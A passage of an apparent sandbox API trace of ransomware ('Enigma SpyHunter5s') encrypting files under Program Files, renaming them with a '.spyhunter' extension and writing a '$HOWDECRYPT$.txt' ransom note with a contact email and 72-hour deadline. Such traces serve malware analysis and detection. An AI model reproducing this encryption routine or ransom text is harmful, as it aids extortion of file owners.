lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.632] GetProcessHeap () returned 0x2c0000 [0092.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.632] GetProcessHeap () returned 0x2c0000 [0092.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e3b0 | out: hHeap=0x2c0000) returned 1 [0092.632] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa88 | out: pbBuffer=0x270fa88) returned 1 [0092.632] GetProcessHeap () returned 0x2c0000 [0092.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.632] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa80*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa80*=0x30) returned 1 [0092.632] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0092.662] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 81 [0092.662] StrStrW (lpFirst="VSTOInstaller.config", lpSrch=".txt") returned 0x0 [0092.662] GetProcessHeap () returned 0x2c0000 [0092.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c238e0 [0092.662] ReadFile (in: hFile=0xcc, lpBuffer=0x2c238e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fa44, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesRead=0x270fa44*=0x2cc, lpOverlapped=0x0) returned 1 [0092.671] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.671] WriteFile (in: hFile=0xcc, lpBuffer=0x2c238e0*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x270fa44, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesWritten=0x270fa44*=0x2cc, lpOverlapped=0x0) returned 1 [0092.671] GetProcessHeap () returned 0x2c0000 [0092.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c238e0 | out: hHeap=0x2c0000) returned 1 [0092.672] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.672] WriteFile (in: hFile=0xcc, lpBuffer=0x270fa84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fa44, lpOverlapped=0x0 | out: lpBuffer=0x270fa84*, lpNumberOfBytesWritten=0x270fa44*=0x4, lpOverlapped=0x0) returned 1 [0092.672] WriteFile (in: hFile=0xcc, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fa44, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270fa44*=0x30, lpOverlapped=0x0) returned 1 [0092.672] CloseHandle (hObject=0xcc) returned 1 [0092.673] GetProcessHeap () returned 0x2c0000 [0092.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0092.674] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.spyhunter") returned 91 [0092.674] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.spyhunter")) returned 1 [0092.675] GetProcessHeap () returned 0x2c0000 [0092.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0092.675] GetProcessHeap () returned 0x2c0000 [0092.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.675] GetProcessHeap () returned 0x2c0000 [0092.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f148 | out: hHeap=0x2c0000) returned 1 [0092.675] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa80 | out: pbBuffer=0x270fa80) returned 1 [0092.675] GetProcessHeap () returned 0x2c0000 [0092.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.675] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa78*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa78*=0x30) returned 1 [0092.676] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\icad.fmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0092.676] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP") returned 78 [0092.676] StrStrW (lpFirst="ICAD.FMP", lpSrch=".txt") returned 0x0 [0092.676] GetProcessHeap () returned 0x2c0000 [0092.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c238e0 [0092.676] ReadFile (in: hFile=0xcc, lpBuffer=0x2c238e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fa3c, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesRead=0x270fa3c*=0x146, lpOverlapped=0x0) returned 1 [0092.677] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.677] WriteFile (in: hFile=0xcc, lpBuffer=0x2c238e0*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x270fa3c, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesWritten=0x270fa3c*=0x146, lpOverlapped=0x0) returned 1 [0092.678] GetProcessHeap () returned 0x2c0000 [0092.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c238e0 | out: hHeap=0x2c0000) returned 1 [0092.679] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.679] WriteFile (in: hFile=0xcc, lpBuffer=0x270fa7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fa3c, lpOverlapped=0x0 | out: lpBuffer=0x270fa7c*, lpNumberOfBytesWritten=0x270fa3c*=0x4, lpOverlapped=0x0) returned 1 [0092.679] WriteFile (in: hFile=0xcc, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fa3c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270fa3c*=0x30, lpOverlapped=0x0) returned 1 [0092.679] CloseHandle (hObject=0xcc) returned 1 [0092.680] GetProcessHeap () returned 0x2c0000 [0092.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0092.681] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP.spyhunter") returned 88 [0092.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\icad.fmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\icad.fmp.spyhunter")) returned 1 [0092.682] GetProcessHeap () returned 0x2c0000 [0092.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0092.682] GetProcessHeap () returned 0x2c0000 [0092.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.682] GetProcessHeap () returned 0x2c0000 [0092.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377e20 | out: hHeap=0x2c0000) returned 1 [0092.682] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa80 | out: pbBuffer=0x270fa80) returned 1 [0092.682] GetProcessHeap () returned 0x2c0000 [0092.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.682] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa78*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa78*=0x30) returned 1 [0092.682] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\ic-txt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0092.682] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX") returned 80 [0092.682] StrStrW (lpFirst="IC-TXT.SHX", lpSrch=".txt") returned 0x0 [0092.682] GetProcessHeap () returned 0x2c0000 [0092.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c238e0 [0092.683] ReadFile (in: hFile=0xcc, lpBuffer=0x2c238e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fa3c, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesRead=0x270fa3c*=0x2800, lpOverlapped=0x0) returned 1 [0092.696] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.696] WriteFile (in: hFile=0xcc, lpBuffer=0x2c238e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fa3c, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesWritten=0x270fa3c*=0x2800, lpOverlapped=0x0) returned 1 [0092.696] GetProcessHeap () returned 0x2c0000 [0092.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c238e0 | out: hHeap=0x2c0000) returned 1 [0092.696] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.696] WriteFile (in: hFile=0xcc, lpBuffer=0x270fa7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fa3c, lpOverlapped=0x0 | out: lpBuffer=0x270fa7c*, lpNumberOfBytesWritten=0x270fa3c*=0x4, lpOverlapped=0x0) returned 1 [0092.696] WriteFile (in: hFile=0xcc, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fa3c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270fa3c*=0x30, lpOverlapped=0x0) returned 1 [0092.697] CloseHandle (hObject=0xcc) returned 1 [0092.697] GetProcessHeap () returned 0x2c0000 [0092.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0092.698] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX.spyhunter") returned 90 [0092.698] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\ic-txt.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\ic-txt.shx.spyhunter")) returned 1 [0092.698] GetProcessHeap () returned 0x2c0000 [0092.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0092.698] GetProcessHeap () returned 0x2c0000 [0092.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.699] GetProcessHeap () returned 0x2c0000 [0092.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ee78 | out: hHeap=0x2c0000) returned 1 [0092.699] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa78 | out: pbBuffer=0x270fa78) returned 1 [0092.699] GetProcessHeap () returned 0x2c0000 [0092.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.699] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa70*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa70*=0x30) returned 1 [0092.699] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\extfont.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0092.699] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX") returned 81 [0092.699] StrStrW (lpFirst="EXTFONT.SHX", lpSrch=".txt") returned 0x0 [0092.699] GetProcessHeap () returned 0x2c0000 [0092.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c238e0 [0092.699] ReadFile (in: hFile=0xcc, lpBuffer=0x2c238e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fa34, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesRead=0x270fa34*=0x2800, lpOverlapped=0x0) returned 1 [0092.711] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.711] WriteFile (in: hFile=0xcc, lpBuffer=0x2c238e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fa34, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesWritten=0x270fa34*=0x2800, lpOverlapped=0x0) returned 1 [0092.711] GetProcessHeap () returned 0x2c0000 [0092.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c238e0 | out: hHeap=0x2c0000) returned 1 [0092.713] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.713] WriteFile (in: hFile=0xcc, lpBuffer=0x270fa74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fa34, lpOverlapped=0x0 | out: lpBuffer=0x270fa74*, lpNumberOfBytesWritten=0x270fa34*=0x4, lpOverlapped=0x0) returned 1 [0092.722] WriteFile (in: hFile=0xcc, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fa34, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270fa34*=0x30, lpOverlapped=0x0) returned 1 [0092.722] CloseHandle (hObject=0xcc) returned 1 [0092.749] GetProcessHeap () returned 0x2c0000 [0092.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0092.750] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX.spyhunter") returned 91 [0092.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\extfont.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\extfont.shx.spyhunter")) returned 1 [0092.751] GetProcessHeap () returned 0x2c0000 [0092.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0092.751] GetProcessHeap () returned 0x2c0000 [0092.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.751] GetProcessHeap () returned 0x2c0000 [0092.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ec98 | out: hHeap=0x2c0000) returned 1 [0092.751] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0092.752] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.752] WriteFile (in: hFile=0xcc, lpBuffer=0x270f9ab*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fad4, lpOverlapped=0x0 | out: lpBuffer=0x270f9ab*, lpNumberOfBytesWritten=0x270fad4*=0x127, lpOverlapped=0x0) returned 1 [0092.753] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.753] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fad4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fad4*=0x2ac, lpOverlapped=0x0) returned 1 [0092.753] CloseHandle (hObject=0xcc) returned 1 [0092.753] GetProcessHeap () returned 0x2c0000 [0092.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e200 | out: hHeap=0x2c0000) returned 1 [0092.753] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa70 | out: pbBuffer=0x270fa70) returned 1 [0092.753] GetProcessHeap () returned 0x2c0000 [0092.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.753] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa68*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa68*=0x30) returned 1 [0092.753] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\vintage.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\vintage.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.755] GetProcessHeap () returned 0x2c0000 [0092.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.756] GetProcessHeap () returned 0x2c0000 [0092.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358d60 | out: hHeap=0x2c0000) returned 1 [0092.756] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa70 | out: pbBuffer=0x270fa70) returned 1 [0092.756] GetProcessHeap () returned 0x2c0000 [0092.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.756] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa68*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa68*=0x30) returned 1 [0092.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.756] GetProcessHeap () returned 0x2c0000 [0092.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.756] GetProcessHeap () returned 0x2c0000 [0092.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a260 | out: hHeap=0x2c0000) returned 1 [0092.756] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa68 | out: pbBuffer=0x270fa68) returned 1 [0092.756] GetProcessHeap () returned 0x2c0000 [0092.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.756] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa60*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa60*=0x30) returned 1 [0092.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.756] GetProcessHeap () returned 0x2c0000 [0092.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.756] GetProcessHeap () returned 0x2c0000 [0092.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355980 | out: hHeap=0x2c0000) returned 1 [0092.756] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa68 | out: pbBuffer=0x270fa68) returned 1 [0092.757] GetProcessHeap () returned 0x2c0000 [0092.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.757] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa60*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa60*=0x30) returned 1 [0092.757] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.757] GetProcessHeap () returned 0x2c0000 [0092.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.757] GetProcessHeap () returned 0x2c0000 [0092.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381988 | out: hHeap=0x2c0000) returned 1 [0092.757] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa60 | out: pbBuffer=0x270fa60) returned 1 [0092.757] GetProcessHeap () returned 0x2c0000 [0092.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.757] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa58*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa58*=0x30) returned 1 [0092.757] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.757] GetProcessHeap () returned 0x2c0000 [0092.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.757] GetProcessHeap () returned 0x2c0000 [0092.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a160 | out: hHeap=0x2c0000) returned 1 [0092.757] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fa60 | out: pbBuffer=0x270fa60) returned 1 [0092.761] GetProcessHeap () returned 0x2c0000 [0092.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.761] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fa58*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fa58*=0x30) returned 1 [0092.761] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 